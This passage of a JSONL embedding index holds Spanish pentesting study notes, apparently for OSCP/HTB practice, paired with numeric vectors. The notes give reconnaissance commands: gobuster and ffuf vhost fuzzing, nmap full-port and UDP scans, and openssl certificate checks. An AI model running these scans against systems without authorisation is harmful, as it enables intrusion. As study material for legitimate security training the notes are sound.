0.02417, 0.02226, 0.01258, -0.01241, -0.00028, -0.02766, 0.03133, -0.03203, -0.04587, -0.03527, 0.02214, 0.01537, -0.02889, 0.04963, 0.01589, 0.04873, -0.06721, -0.00861, 0.00844, 0.01675, 0.01116, 0.02588, -0.02445, 0.01683, 0.01508, 0.0179, -0.02113, -0.00918, -0.05246, -0.05329, -0.02054, -0.0655, -0.05041, -0.01127, -0.04207, 0.02309, -0.04818, -0.03674, 0.0549, -0.06132, 0.00038, -0.01442, 0.0094, -0.03633, 0.04677, 0.01024, -0.03412, -0.01246, 0.00776, -0.0282, -0.01575, 0.05731]} +{"tipo": "metodologia", "herramienta": "Vhosts y subdominios", "perfil": "PENTESTERS", "tema": "enumeracion", "fichero": "conocimiento/01 - Enumeracion/Vhosts y subdominios.md", "texto": "# Vhosts y subdominios\n\n> Si te encuentras una \"default Apache page\", probablemente hay **virtual hosts** ocultos. Parte de Trampas de enumeración.", "v": [0.05421, 0.06058, -0.13138, -0.02479, 0.03053, 0.00973, 0.07102, -0.10817, 0.1832, -0.037, -0.05942, -0.20565, 0.03219, 0.06803, 0.05476, 0.06685, 0.10963, -0.13193, 0.09095, 0.10074, 0.03913, -0.04292, -0.15194, 0.01542, 0.06276, -0.06852, -0.01702, 0.04027, -0.10272, -0.06343, 0.09301, -0.06423, -0.0856, -0.01284, -0.03033, -0.16614, -0.05455, -0.09387, 0.04376, 0.15995, 0.11354, 0.03786, -0.03358, 0.09474, -0.05553, -0.02602, -0.09958, 0.00708, 0.08146, -0.11469, -0.15694, -0.00573, -0.16288, -0.06041, 0.06503, 0.05828, 0.05844, -0.15371, 0.06927, -0.02785, -0.01921, 0.0175, 0.06921, -0.01463, 0.08586, -0.02681, -0.03492, 0.0179, -0.07075, 0.02576, 0.01707, -0.03771, -0.02409, 0.03548, 0.08173, -0.02562, 0.0107, -0.03101, 0.07412, 0.04985, 0.00229, 0.00609, 0.01711, 0.09353, -0.09563, -0.10975, -0.02146, -0.00625, 0.02882, -0.02337, 0.13589, 0.09572, 0.04549, 0.00932, 0.00325, -0.16711, 0.11059, 0.07981, -0.04909, -0.0149, 0.02708, 0.16395, -0.04693, 0.12645, -0.00807, 0.0882, 0.01954, -0.05695, -0.03777, -0.03047, 0.18678, -0.04412, -0.0795, 0.00748, -0.03007, -0.07913, 0.03581, 0.07914, 0.10524, -0.03997, -0.04219, -0.00386, -0.06828, 0.02563, 0.00871, -0.01984, 0.00852, 0.00874, 0.03964, -0.02038, -0.02924, -0.07514, 0.05132, 0.00462, -0.03141, 0.05303, 0.04083, 0.02815, 0.01329, -0.04551, 0.07736, -0.0016, -0.0294, -0.00618, 0.06112, 0.03662, 0.04138, -0.07034, -0.00756, 0.05469, 0.02946, 0.06397, 0.00747, -0.00985, 0.00505, -0.00584, -0.05157, -0.02869, -0.06204, 0.01627, 0.04998, -0.03936, 0.05824, -0.04283, -0.04654, -0.02299, -0.05556, 0.01454, -0.03358, 0.04496, 0.00271, 0.0357, -0.10564, -0.01513, -0.09189, 0.01186, 0.03345, 0.01138, 0.02623, 0.02978, 0.08572, -0.02318, -0.03584, 0.07254, -0.01789, -0.02209, 0.0824, -0.01948, -0.03983, -0.00548, 0.00846, -0.06543, -0.05694, 0.06556, -0.02002, -0.03776, 0.02915, 0.02611, 0.00911, -0.03913, -0.06837, 0.01162, 0.01874, -0.03872, -0.01332, -0.00602, -0.02057, -0.04319, 0.02678, -0.03506, 0.04812, -0.0716, -0.0167, -0.08171, -0.01296, 0.01887, -0.03541, -0.01862, -0.04697, -0.03982, -0.05124, 0.04385, 0.02675, 0.03866, 0.04451, 0.00964, 0.06998, 0.12489, 0.03685, 0.01418, -0.025, 0.00714, -0.03039, 0.0347, -0.02127, -0.04932, 0.03528, 0.00516, -0.04694, 0.06079, -0.00707, 0.00261, 0.06687, -0.06014, -0.00525, -0.01567, -0.01048, 0.02424, -0.01699, 0.02099, -0.03366, -0.02711, 0.01859, -0.06804, 0.05053, 0.035]} +{"tipo": "metodologia", "herramienta": "Vhosts y subdominios", "perfil": "PENTESTERS", "tema": "enumeracion", "fichero": "conocimiento/01 - Enumeracion/Vhosts y subdominios.md", "texto": "## Fuzzear vhosts\n```bash\ngobuster vhost -u http://IP -w /usr/share/seclists/Discovery/DNS/...\nffuf -H \"Host: FUZZ.objetivo.htb\" -u http://IP\n```", "v": [-0.02545, -0.1752, -0.13805, -0.07813, 0.10575, -0.09475, -0.1243, -0.17291, -0.0051, 0.0943, -0.07713, -0.04359, -0.16086, 0.03062, -0.08277, -0.06987, 0.07157, 0.04787, -0.07571, -0.07054, -0.00777, 0.17741, -0.13165, 0.07679, -0.07603, -0.06923, -0.13105, 0.0289, -0.13849, -0.14777, 0.13968, -0.18506, -0.18482, 0.09196, -0.08723, -0.13457, -0.00973, 0.0717, 0.06565, 0.14217, 0.03568, 0.09363, -0.02912, 0.07813, 0.01018, -0.05557, -0.02707, -0.15417, 0.10482, -0.10752, 0.03483, -0.07159, -0.02257, 0.06041, 0.01863, -0.02104, -0.03022, -0.07148, -0.01891, -0.02625, -0.05482, 0.00116, -0.00612, -0.08907, 0.0656, -0.0456, -0.01788, -0.0257, -0.16273, 0.02426, -0.0142, 0.05439, 0.10392, -0.03874, 0.09786, 0.01012, 0.07535, -0.06044, 0.13337, 0.00994, -0.03016, 0.01068, -0.07092, 0.0419, -0.02731, -0.02307, 0.1101, -0.16614, -0.00832, -0.05299, 0.08185, 0.07681, -0.07469, 0.04971, 0.02703, -0.07693, 0.10021, 0.07612, 0.02633, -0.04161, 0.02894, 0.11438, -0.08204, 0.08193, 0.09606, 0.06437, 0.0401, 0.03293, 0.04245, 0.01623, 0.05932, 0.02407, 0.02738, -0.07424, -0.04233, -0.07368, -0.05756, 0.01211, 0.00624, -0.02667, -0.03574, -0.05534, 0.02209, 0.01969, -0.0079, 0.00986, 0.00615, 0.03491, -0.01697, -0.08869, 0.03923, -0.04194, -0.00544, 0.0233, 5e-05, 0.08502, 0.003, -0.04441, -0.02015, 0.02796, 0.0275, 0.03336, -0.00132, 0.06699, 0.06943, -0.0041, 0.04183, -0.07822, -0.03168, 0.01935, -0.00694, 0.07432, 0.01756, -0.03972, -0.02231, -0.01531, 0.05086, -0.03502, -0.00378, 0.02563, 0.02586, 0.02978, -0.01186, 0.02478, 0.0056, 0.04536, -0.04479, 0.0192, 0.0228, -0.03333, -0.00628, 0.04092, -0.07436, -0.02228, 0.00608, 0.00619, 0.05063, -0.06022, 0.02105, -0.02277, 0.07003, -0.01459, 0.01413, 0.04756, 0.01295, 0.00128, 0.05363, 0.02649, -0.04197, -0.01079, 0.05089, 0.00976, -0.06711, 0.06482, -0.00654, -0.01737, -0.03002, -0.08622, -0.00145, -0.00125, -0.05313, -0.0197, -0.03687, 0.00157, -0.02588, -0.04418, -0.034, 0.02235, -0.062, -0.03816, 0.02347, -0.03411, 0.04143, -0.03778, -0.02182, 0.03318, 0.00652, -0.00468, 0.01209, -0.02868, -0.0245, 0.08555, -0.01936, -0.01824, -0.01169, -0.02811, 0.03117, 0.00166, 0.02114, -0.00979, -0.02697, 0.04931, -0.00757, -0.02688, 0.00358, -0.03314, -0.00989, 0.01162, -0.00259, -0.00969, -0.034, -0.02385, 0.00541, -0.02436, -0.02571, -0.07144, -0.04877, 0.02998, 0.02816, -0.01039, -0.01626, -0.06961, -0.01844, -0.06743, 0.00242, 0.03552]} +{"tipo": "metodologia", "herramienta": "Vhosts y subdominios", "perfil": "PENTESTERS", "tema": "enumeracion", "fichero": "conocimiento/01 - Enumeracion/Vhosts y subdominios.md", "texto": "## /etc/hosts\n- Si la web carga rara o redirige, mira el header `Host:`.\n- **Añade el dominio a `/etc/hosts` SIEMPRE** que aparezca un hostname.", "v": [0.12058, -0.0612, -0.1067, -0.04844, 0.21757, -0.02563, 0.00384, -0.12948, -0.03684, -0.01874, -0.09246, -0.13917, 0.06106, -0.11825, 0.20591, 0.02866, 0.08555, 0.06893, -0.00485, 0.04974, 0.02003, 0.1429, -0.04623, 0.07802, -0.02215, -0.15427, 0.13934, 0.12672, -0.08946, -0.00882, 0.0681, -0.07527, 0.01205, 0.02032, 0.00095, -0.07375, -0.03536, -0.07026, 0.04156, 0.09005, 0.03602, 0.07163, -0.0272, -0.01657, -0.13192, 0.00179, -0.01446, -0.09203, 0.04702, -0.10823, 0.00481, -0.05782, -0.17891, -0.02495, 0.08926, 0.07438, 0.10024, -0.04952, -0.08405, -0.02201, 0.02908, 0.011, 0.04477, 0.03311, 0.05099, -0.01314, -0.07799, 0.02897, -0.08476, 0.00411, -0.03019, 0.01318, 0.05975, -0.08638, 0.10187, -0.00555, 0.06617, 0.00421, 0.05189, -0.04264, 0.03687, 0.00435, -0.03818, 0.0386, -0.10903, -0.09035, -0.01934, -0.12336, -0.00832, -0.01515, 0.1436, 0.06008, 0.05575, 0.01235, -0.03629, -0.12059, 0.10067, -0.00025, -0.00035, -0.06861, 0.02191, 0.18545, 0.02386, 0.11941, 0.14534, 0.16918, 0.04662, -0.09113, 0.01252, -0.03287, 0.06291, -0.06899, -0.04654, -0.0383, -0.09008, -0.02917, -0.03956, 0.04968, 0.09652, -0.05169, -0.09734, -0.11871, 0.0447, 0.07007, -0.0372, -0.00156, 0.00859, -0.02802, 0.02613, -0.03261, 0.00351, -0.09998, 0.02986, -0.00249, 0.00993, 0.0001, 0.0136, -0.02255, 0.02485, 0.06647, 0.01526, 0.03456, -0.087, 0.00431, 0.07046, -0.0085, 0.02953, -0.09502, -0.0776, 0.03261, 0.0054, 0.07307, 0.02471, 0.00429, -0.0297, -0.01603, -0.02777, -0.07862, -0.03612, 0.06019, -0.00186, -0.09019, 0.01926, 0.00693, -0.02096, 0.04586, 0.01344, -0.00745, 0.04108, 0.00548, -0.04732, 0.00981, -0.07431, -0.04071, -0.00732, -0.02507, -0.03479, -0.08677, -0.05228, -0.07548, 0.02868, -0.05877, 0.0147, 0.12391, -0.04546, 0.03249, 0.04518, -0.01801, -0.08122, -0.0334, 0.0138, 0.03838, -0.06953, 0.05093, 0.04619, 0.01243, -0.06278, -0.07034, 0.01175, 0.01035, -0.0298, -0.03874, 0.02608, -0.04326, -0.00999, -0.03154, -0.03622, 0.00598, 0.05171, 0.03204, -0.04969, -0.04331, 0.0081, -0.04161, -0.04278, 0.01507, 0.0115, -0.01777, -0.0022, -0.02979, 0.01368, 0.0535, 0.01647, 0.01109, 0.04897, 0.03977, 0.05902, 0.01788, 0.05454, -0.02087, -0.03337, 0.01473, 0.01763, -0.00314, 0.01722, -0.00777, 0.05629, -0.02873, -0.02919, 0.05074, -0.03092, -0.00674, -0.00031, -0.03345, 0.00831, -0.04423, -0.05671, -0.01652, 0.0148, 0.00901, -0.03872, -0.02057, -2e-05, -0.04048, 0.01147, 0.03111]} +{"tipo": "metodologia", "herramienta": "Vhosts y subdominios", "perfil": "PENTESTERS", "tema": "enumeracion", "fichero": "conocimiento/01 - Enumeracion/Vhosts y subdominios.md", "texto": "## HTTPS revela hostnames\n```bash\nopenssl s_client -connect IP:443\n```\n- El **certificado** te puede chivar el dominio real (CN / SAN).\n\nRelacionado: Enumeración web · Nmap · OSCP MOC", "v": [-0.05487, -0.13756, -0.0323, -0.098, -0.00293, -0.31342, -0.02221, -0.05735, -0.05688, 0.12101, -0.1065, -0.14285, 0.03963, -0.12177, -0.0257, 0.08371, 0.07416, -0.02995, 0.05539, 0.00239, -0.07883, 0.01593, -0.13381, 0.01, 0.01747, 0.04168, -0.10533, 0.07811, -0.0874, -0.00709, 0.05456, -0.09856, -0.07563, 0.14983, -0.07225, 0.02765, -0.05463, 0.03808, -0.01945, 0.13211, 0.00922, 0.02168, -0.09177, 0.11086, 0.03589, -0.09181, 0.05664, -0.10444, 0.0499, -0.15477, -0.08842, -0.11781, -0.2552, 0.00407, -0.02196, 0.05907, 0.08886, -0.02599, 0.01507, -0.00719, -0.05222, -0.07551, -0.03756, -0.02462, 0.01857, -0.07776, -0.00956, 0.05343, -0.12035, 0.01465, 0.02443, 0.08306, -0.00798, -0.01907, 0.14376, -0.04537, 0.07497, -0.08978, 0.11028, 0.04993, 0.04768, -0.00278, 0.00252, 0.01642, -0.09384, -0.01959, -0.01327, -0.08225, 0.07508, -0.02784, 0.1392, 0.1182, -0.03172, -0.02236, 0.00565, -0.13912, 0.00519, -0.07208, -0.02127, -0.07153, -0.00082, 0.20467, -0.0749, 0.03475, 0.11491, 0.0889, 0.06678, -0.01641, 0.01033, 0.04484, 0.07127, 0.00205, -0.04758, -0.04271, -0.02613, -0.02848, -0.02126, -0.01866, 0.06629, -0.04027, -0.0292, -0.06993, 0.00479, 0.04531, -0.06284, 0.0675, -0.04787, 0.01715, -0.01581, -0.05632, -0.02972, -0.07686, -0.04193, -0.01963, -0.03088, 0.00964, 0.00632, -0.06781, 0.01313, 0.02188, 0.0154, -0.04585, -0.05457, 0.00517, 0.04684, -0.01126, -0.03839, -0.048, -0.04628, 0.02258, 0.0135, 0.07733, -0.05823, 0.02803, -0.04936, -0.02176, -0.05319, -0.07675, -0.07057, 0.07776, 0.0641, 0.01197, 0.0263, 0.0665, -0.00575, 0.07292, -0.04517, 0.03683, 0.01899, -0.01279, 0.04281, 0.03149, -0.03923, -0.07406, -0.01883, -0.03572, -0.00097, -0.04351, -0.02383, -0.03659, 0.03154, -0.0478, 0.07644, 0.01016, 0.0262, 0.05781, 0.04452, -0.01402, -0.03394, -0.01827, 0.01675, -0.01734, -0.07958, 0.03436, 0.02314, -0.01285, 0.02391, -0.07706, -0.0341, -0.02369, -0.04438, -0.07219, 0.02007, 0.00423, -0.00864, -0.00887, 0.0178, 0.01688, -0.01925, -0.04878, -0.00625, -0.04521, 0.03781, -0.05598, -0.02913, 0.00284, 0.00563, 0.03737, -0.02307, -0.01952, -0.02538, -0.00379, -0.01048, 0.011, 0.0699, 0.02415, 0.02682, -0.0466, -0.00168, -0.03923, -0.01104, -0.0381, -0.01685, -0.0272, 0.07526, -0.02372, -0.02907, -0.00697, -0.02418, -0.00374, -0.0303, -0.00191, -0.00332, -0.02116, 0.01189, -0.0527, -0.03542, -0.05106, -0.00872, 0.00715, -0.04509, -0.05081, -0.02506, -0.05529, -0.03368, 0.02104]} +{"tipo": "metodologia", "herramienta": "Puertos olvidados", "perfil": "PENTESTERS", "tema": "enumeracion", "fichero": "conocimiento/01 - Enumeracion/Puertos olvidados.md", "texto": "# Puertos olvidados\n\n> Donde la gente pierde 4 horas: escanear solo el top-1000 TCP. Parte de Trampas de enumeración.", "v": [-0.04074, -0.04352, -0.05566, -0.01501, -0.03159, 0.06052, 0.1719, 0.02044, -0.04977, 0.19651, -0.02539, 0.10427, 0.13082, 0.01254, -0.04036, -0.04167, -0.05638, 0.10196, 0.29673, -0.03733, -0.04261, -0.01723, 0.03524, -0.13786, 0.16341, -0.06718, -0.1687, -0.01227, -0.05374, -0.00966, 0.03105, -0.00309, 0.00937, -0.00047, 0.02613, -0.10546, 0.01734, -0.04583, 0.05646, 0.06533, 0.16294, 0.13579, -0.10766, 0.03923, 0.06264, -0.02996, -0.00391, 0.1096, 0.06276, 0.03705, -0.14796, 0.01415, -0.05673, -0.12258, -0.04444, 0.05943, 0.01918, 0.07888, -0.10726, -0.04066, 0.01635, 0.02604, 0.05928, -0.14254, -0.05254, -0.04415, -0.03045, 0.07329, 0.07477, 0.1006, -0.00833, 0.01738, 0.05124, -0.02542, 0.07594, -0.15567, 0.0434, -0.01728, 0.02346, 0.07209, -0.01766, -0.07783, -0.06007, -0.01757, -0.05019, 0.00372, 0.02736, 0.03408, -0.01579, 0.01324, 0.04167, 0.0565, 0.05507, 0.06195, -0.08291, -0.03627, 0.05281, 0.09596, -0.02438, 0.13759, 0.06356, 0.04827, -0.02485, 0.02309, -0.01123, 0.0589, 0.0577, -0.02089, 0.03491, 0.07519, 0.09342, -0.00782, -0.09495, -0.00622, -0.08992, -0.02558, -0.03891, -0.08653, 0.08113, -0.05513, 0.1113, 0.02945, -0.01799, -0.03702, 0.01741, -0.02481, 0.0154, 0.01991, 0.1196, -0.0769, 0.0391, 0.03226, 0.00598, -0.04294, -0.11119, 0.00453, 0.02229, 0.05761, -0.02814, -0.03584, 0.06422, 0.05999, -0.0886, -0.0653, 0.03937, 0.02364, 0.06745, -0.0117, 0.01154, 0.03245, 0.05211, -0.02084, -0.00833, -0.02661, 0.039, -0.08262, 0.04715, -0.0033, -0.05728, -0.02376, 0.03853, 0.05576, 0.00637, 0.00176, 0.06836, -0.03703, 0.01767, 0.0961, -0.03668, 0.05535, 0.0141, -0.00276, -0.0815, -0.02556, -0.15526, 0.01364, 0.01827, 0.01696, -0.07509, 0.0436, -0.02072, -0.00885, -0.05172, -8e-05, 0.0083, -0.04814, 0.01701, -0.0514, -0.02595, 0.07301, -0.01065, -0.10081, 0.02499, 0.01602, 0.01399, 0.06146, 0.11335, -0.05669, -0.01462, -0.01275, -0.00823, 0.02591, 0.05094, 0.00916, 0.00679, 0.00991, 0.01518, 0.03568, -0.02753, 0.01869, -0.03394, 0.03769, -0.01895, -0.06704, -0.03056, -0.01859, 0.02078, 0.08391, -0.03935, 0.04181, -0.02971, 0.01202, -0.00616, 0.05307, -0.03216, -0.01649, 0.08439, 0.017, 0.0598, 0.0142, -0.01607, 0.00428, 0.03684, -0.03057, 0.02193, -0.00027, -0.03233, -0.06188, -0.02945, 0.03508, 0.0405, 0.04946, -0.06309, -0.03009, -0.07135, -0.00562, -0.05427, 0.0442, 0.02502, 0.01804, 0.04658, -0.07425, 0.00865, -0.05416, 0.03386, -0.04084]} +{"tipo": "metodologia", "herramienta": "Puertos olvidados", "perfil": "PENTESTERS", "tema": "enumeracion", "fichero": "conocimiento/01 - Enumeracion/Puertos olvidados.md", "texto": "## UDP (casi siempre olvidado)\n```bash\nnmap -sU --top-ports 50 -T4 IP\n```\n- **SNMP (161)**, TFTP (69), NTP (123) suelen dar oro → ver SNMP.", "v": [-0.01339, -0.15679, -0.08919, -0.06043, -0.02213, -0.06438, -0.03867, -0.08172, -0.06772, 0.256, -0.02589, 0.01606, 0.20448, -0.03971, -0.23661, 0.02223, -0.10515, -0.1382, 0.19194, 0.08535, -0.04063, 0.11102, -0.08968, -0.04546, 0.0761, 0.09605, -0.11769, 0.04996, -0.10265, -0.03811, 0.05174, -0.08959, -0.11276, -0.08065, -0.04411, -0.01056, -0.0146, 0.04004, 0.0041, 0.1228, 0.07669, 0.01271, -0.06957, -0.00372, 0.15769, 0.02914, 0.00599, 0.01692, 0.06391, -0.06354, -0.08686, 0.00887, -0.00809, -0.03069, -0.14372, 0.02399, 0.05502, 0.10982, -0.03509, 0.03839, 0.01241, 0.08248, -0.06657, -0.13901, 0.00816, -0.09425, -0.01113, -0.08431, -0.04977, -0.02348, -0.09309, 0.01509, -0.01996, -0.0102, 0.07597, 0.00416, 0.06431, -0.08467, 0.11102, 0.09845, -0.02693, -0.04358, -0.14801, -0.05424, -0.08162, -0.07362, 0.10449, -0.0062, -0.07569, -0.04451, 0.02856, 0.10291, 0.01355, 0.07151, 0.02454, -0.08094, -0.00735, 0.02393, 0.03335, -0.0033, 0.05483, 0.13462, -0.0672, 0.02234, 0.03463, 0.02321, 0.1133, 0.04149, 0.07271, 0.03488, -0.01275, 0.05176, -0.0131, -0.10758, 0.03366, -0.01299, -0.04172, 0.01995, 0.02414, -0.03002, 0.02332, -0.04302, -0.02353, -0.01109, -0.00122, 0.00623, 0.03526, 0.0158, 0.04832, 0.02434, 6e-05, 0.05779, -0.02221, 0.0137, -0.00748, 0.00721, 0.03963, -0.01133, -0.01923, 0.10057, 0.03926, 0.01905, -0.05271, -0.01338, 0.03122, 0.01432, 0.05133, -0.05782, 0.00768, 0.04688, 0.07338, 0.06216, -0.02871, -0.04569, 0.07174, -0.02809, 0.0274, -0.12225, -0.0567, 0.01043, -0.04015, 0.06981, 0.07335, 0.07784, 0.01711, 0.0476, -0.03819, 0.0112, 0.0164, -0.10921, 0.04473, -0.00312, -0.06501, -0.05254, -0.04673, -0.09544, -0.01268, -0.05212, 0.00547, -0.0137, -0.02023, -0.04455, -0.00746, 0.04302, 0.02059, -0.03035, 0.09478, -0.05318, 0.04178, -0.0638, 0.02084, 0.02631, 0.02362, -0.01252, 0.02762, -0.0104, 0.01493, -0.0905, 0.00471, -0.02345, -0.04553, -0.00196, -0.01329, -0.04049, -0.01156, -0.01911, -0.00784, 0.09419, -0.04889, 0.03966, 0.01073, -0.07344, 0.03676, -0.03878, -0.04062, -0.02702, -0.03319, 0.02591, 0.05078, 0.01523, 0.02805, -0.00286, 0.00932, 0.01877, -0.0389, -0.02174, 0.01643, -0.0024, 0.06278, -0.03019, -0.02697, 0.04943, -0.00727, -0.10303, 0.05745, 0.00624, -0.07572, 0.01182, -0.03706, 0.03531, 0.0123, -0.00558, -0.03363, 0.01754, -0.02879, -0.0327, -0.053, 0.03025, -0.01047, 0.01241, 0.01221, -0.02275, 0.01566, -0.03095, -0.04001, -0.01997]} +{"tipo": "metodologia", "herramienta": "Puertos olvidados", "perfil": "PENTESTERS", "tema": "enumeracion", "fichero": "conocimiento/01 - Enumeracion/Puertos olvidados.md", "texto": "## Puertos altos TCP\n```bash\nnmap -p- --min-rate=5000 IP # los 65535, no solo top-1000\n```\n- Servicios escondidos en puertos raros (8080, 50000+...).", "v": [0.16182, -0.12806, 0.00691, 0.02847, 0.02343, -0.15457, 0.10368, -0.05742, -0.12139, 0.09151, 0.03326, 0.06808, 0.11781, -0.05839, -0.10115, -0.11737, -0.16572, 0.12442, 0.11187, 0.01986, 0.01345, 0.07565, -0.08414, -0.06222, 0.13363, 0.13666, -0.09605, 0.04044, -0.09875, 0.01364, 0.05029, -0.00032, -0.11328, 0.04921, -0.02978, -0.06457, -0.00359, 0.06048, -0.02352, 0.04889, 0.06335, 0.09933, -0.00812, -0.05687, 0.18729, -0.05017, 0.03939, -0.00682, 0.06811, -0.0697, -0.08626, -0.12322, -0.06687, 0.00546, -0.11496, 0.01136, 0.12606, 0.15154, -0.11202, 0.00547, 0.06825, 0.04699, -0.07442, -0.16279, 0.00408, -0.05545, -0.04517, -0.01458, -0.0316, 0.01256, -0.10702, 0.02014, -0.03717, 0.05166, 0.16267, -0.02422, 0.0366, -0.07173, 0.03665, 0.03182, -0.01135, -0.01169, -0.13485, -0.05254, -0.14943, -0.0614, -0.05722, -0.01022, 0.06629, -0.06833, 0.04709, 0.02249, 0.06886, 0.09904, -0.00361, -0.08216, 0.02462, 0.09351, -0.02132, -0.00726, 0.06833, 0.13744, -0.0631, 0.0255, 0.09221, 0.06402, -0.00578, -0.02274, 0.09182, 0.04411, 0.07263, 0.03768, 0.0288, -0.06976, -0.02979, 0.00572, -0.00694, -0.03349, 0.05853, -0.08457, -0.00551, 0.00784, 0.05382, 0.08441, 0.02104, -0.02086, -0.08024, 0.04624, 0.11239, 0.00472, 0.06104, -0.00871, -0.03375, -0.01525, -0.01889, 0.02505, 0.06997, -0.04929, -0.00482, 0.03505, 0.05702, 0.05775, -0.0465, 0.04769, 0.05666, -0.02097, -0.00028, -0.02752, -0.04251, 0.01068, 0.05467, -0.04019, -0.06217, -0.03264, -0.00011, 0.00431, 0.02269, -0.13181, -0.04443, 0.00676, 0.09066, 0.05724, 0.00924, 0.03629, -0.00134, -0.0035, 0.00266, 0.03244, 0.0617, -0.02316, -0.00041, -0.0344, -0.12281, -0.08199, 0.03992, 0.03369, 0.00933, -0.06175, -0.01643, -0.02006, 0.04266, 0.01074, 0.00916, -0.03619, 0.01623, -0.04252, 0.06455, -0.10676, 0.00167, 0.03113, 0.01237, -0.0124, -0.04548, 0.02308, 0.03611, 0.05423, 0.02631, -0.05218, -0.01926, -0.01469, 0.01395, 0.03681, 0.02865, -0.06553, 0.01217, -0.03014, -0.03635, 0.0581, -0.01912, 0.03958, -0.02069, 0.0075, 0.01273, 0.0351, -0.11827, -0.00578, -0.00786, 0.00421, 0.02545, 0.04604, -0.07159, 0.05984, -0.03892, 0.05336, 0.09018, -0.03026, 0.03276, 0.01198, 0.04973, 0.05388, -0.05071, 0.01875, 0.00789, -0.05551, 0.01099, 0.04621, 0.00049, -0.04251, -0.02616, 0.022, 0.00497, 0.01134, 0.00315, -0.05483, -0.00528, -0.02586, -0.04339, 0.04526, -0.00119, 0.01128, 0.03121, -0.03473, -0.01237, -0.06161, 0.0198, -0.00492]} +{"tipo": "metodologia", "herramienta": "Puertos olvidados", "perfil": "PENTESTERS", "tema": "enumeracion", "fichero": "conocimiento/01 - Enumeracion/Puertos olvidados.md", "texto": "## Por qué importa\n- Nmap por defecto escanea **solo top-1000 TCP**. Un servicio vulnerable en el 54321 es invisible si no haces `-p-`.\n- Regla: **siempre** un `-p-` completo además del rápido.\n\nRelacionado: Nmap · Enumeración · OSCP MOC", "v": [-0.13467, -0.01181, -0.14924, 0.10293, -0.01227, -0.22488, -0.02206, 0.07181, -0.10381, 0.00509, -0.06665, -0.05682, 0.06647, -0.06427, -0.11641, 0.06505, -0.11945, 0.01152, 0.1258, 0.08094, -0.0925, 0.02372, -0.09567, -0.02114, 0.06355, 0.11254, -0.13336, 0.04221, -0.10797, -0.07538, -0.00393, -0.02697, -0.01005, -0.02278, -0.05332, 0.03355, 0.04601, -0.08888, -0.00747, 0.12352, 0.02488, 0.13957, -0.09325, 0.13491, 0.14903, -0.06752, 0.03717, 0.05278, -0.00325, -0.00081, -0.08416, -0.04765, -0.15537, -0.05748, -0.04945, 0.03755, -0.00129, 0.05152, -0.03001, -0.02293, 0.06655, 0.05703, -0.04791, -0.20878, 0.01203, -0.0944, -0.08376, -0.08198, -0.07422, 0.02404, -0.04907, 0.05259, 0.05666, -0.10648, 0.08457, -0.06365, 0.03183, -0.06315, 0.04162, 0.05209, 0.09224, -0.00317, -0.17524, -0.02508, -0.08246, -0.01448, 0.10569, 0.04723, 0.01966, -0.11474, 0.11879, 0.01923, 0.01538, 0.04395, 0.02592, -0.04486, -0.07739, 0.00229, 0.02785, -0.03415, 0.0666, 0.06723, -0.0548, 0.0367, 0.07526, 0.01313, 0.07601, 0.03811, 0.03063, 0.01434, 0.0284, 0.06574, -0.06769, -0.04377, -0.02908, -0.03127, -0.03437, 0.05513, 0.01455, -0.00396, -0.04034, 0.01518, 0.02226, 0.05128, 0.06861, 0.00129, -0.03085, 0.04997, 0.04429, 0.00281, -0.08017, -0.03, -0.04786, -0.09855, -0.03505, -0.0977, 0.02732, -0.07715, 0.07673, 0.02036, 0.0713, -0.02264, 0.00088, 0.06835, 0.01057, 0.03485, 0.01004, -0.08573, -0.09171, 0.08683, 0.07476, 0.04756, -0.03174, 0.03945, 0.06788, -0.05379, 0.01077, -0.11969, -0.06966, 0.03807, 0.04371, 0.07546, 0.03707, 0.10309, -0.03245, -0.06825, 0.06236, -0.01252, 0.01231, -0.06259, 0.00417, -0.01795, -0.04501, -0.0175, -0.02022, -0.04834, 0.00862, -0.03678, -0.02565, -0.03297, 0.00805, -0.0355, 0.05525, -0.0206, -0.00445, 0.01384, 0.02004, 0.00391, 0.00582, -0.04106, 0.04131, -0.05248, 0.03749, -0.01629, 0.04167, -0.05295, 0.05367, -0.0564, -0.04452, -0.04402, -0.03885, -0.07836, 0.05048, 0.01794, 0.01179, -0.03489, 0.03419, 0.05367, -0.0307, 0.01463, 0.01538, 0.01703, 0.06616, -0.02713, -0.05713, -0.03053, -0.00481, 0.05485, 0.02155, 0.02782, 0.00685, -0.05392, 0.01875, 0.00202, 0.06972, -0.03631, 0.02968, -0.00633, 0.01391, 0.03046, 0.06228, -0.00358, 0.02401, -0.10489, 0.00456, -0.02537, -0.06504, -0.0275, -0.04183, -0.03683, -0.02527, 0.05656, -0.01164, -0.06452, -0.03215, -0.09987, -0.00403, 0.0316, -0.0065, -0.05506, -0.0233, -0.05302, -0.00221, -0.12876, 0.06224, -0.01547]} +{"tipo": "metodologia", "herramienta": "Nmap", "perfil": "PENTESTERS", "tema": "enumeracion", "fichero": "conocimiento/01 - Enumeracion/Nmap.md", "texto": "# Nmap\n\n> `-sS` = TCP SYN · `-sU` = UDP · `-sV` = versión. Parte de Enumeración.", "v": [-0.18203, -0.05335, -0.05432, 0.02335, 0.12491, -0.14992, -0.04668, -0.0815, 0.10514, 0.2281, -0.05624, -0.08194, 0.04166, -0.12867, -0.30897, 0.02221, -0.0712, -0.10203, 0.02047, 0.10106, 0.02974, 0.04655, -0.03773, 0.04888, -0.01263, 0.09835, -0.1297, 0.0002, 0.01548, -0.04643, 0.07288, 0.07809, -0.15451, -0.09453, -0.04921, -0.0471, -0.01378, -0.0304, 0.00442, 0.11524, -0.01409, -0.01835, -0.06902, 0.05107, 0.00821, -0.01884, -0.0316, 0.06198, 0.02521, -0.03649, -0.09171, 0.06193, -0.06955, -0.04398, -0.05193, -0.01407, 0.08189, 0.06885, -0.00474, 0.04849, 0.08409, 0.03673, -0.06415, -0.10359, -0.02081, -0.04401, -0.06518, -0.05719, -0.07421, 0.08466, -0.09835, 0.10165, 0.00437, -0.14577, 0.0212, -0.03506, -0.04276, -0.04932, 0.02353, 0.08585, 0.0311, -0.08735, -0.09367, 0.10664, -0.02024, -0.03528, 0.13753, 0.05828, -0.03532, -0.09264, 0.02529, -0.0073, 0.06324, 0.0345, 0.06961, -0.1541, -0.02731, 0.07685, 0.09936, 0.00892, 0.0381, 0.07978, -0.00421, -0.06344, -0.01489, 0.0862, 0.08634, 0.01579, 0.05176, 0.06216, 0.1118, 0.03737, -0.03045, -0.08339, -0.04929, 0.00386, -0.07853, 0.07204, -0.00257, -0.04036, -0.03442, -0.02102, -0.04777, -0.01915, 0.01583, -0.00267, -0.07805, 0.02177, -0.0215, 0.00311, -0.01521, 0.00522, -0.08018, -0.00345, -0.03318, -0.03564, 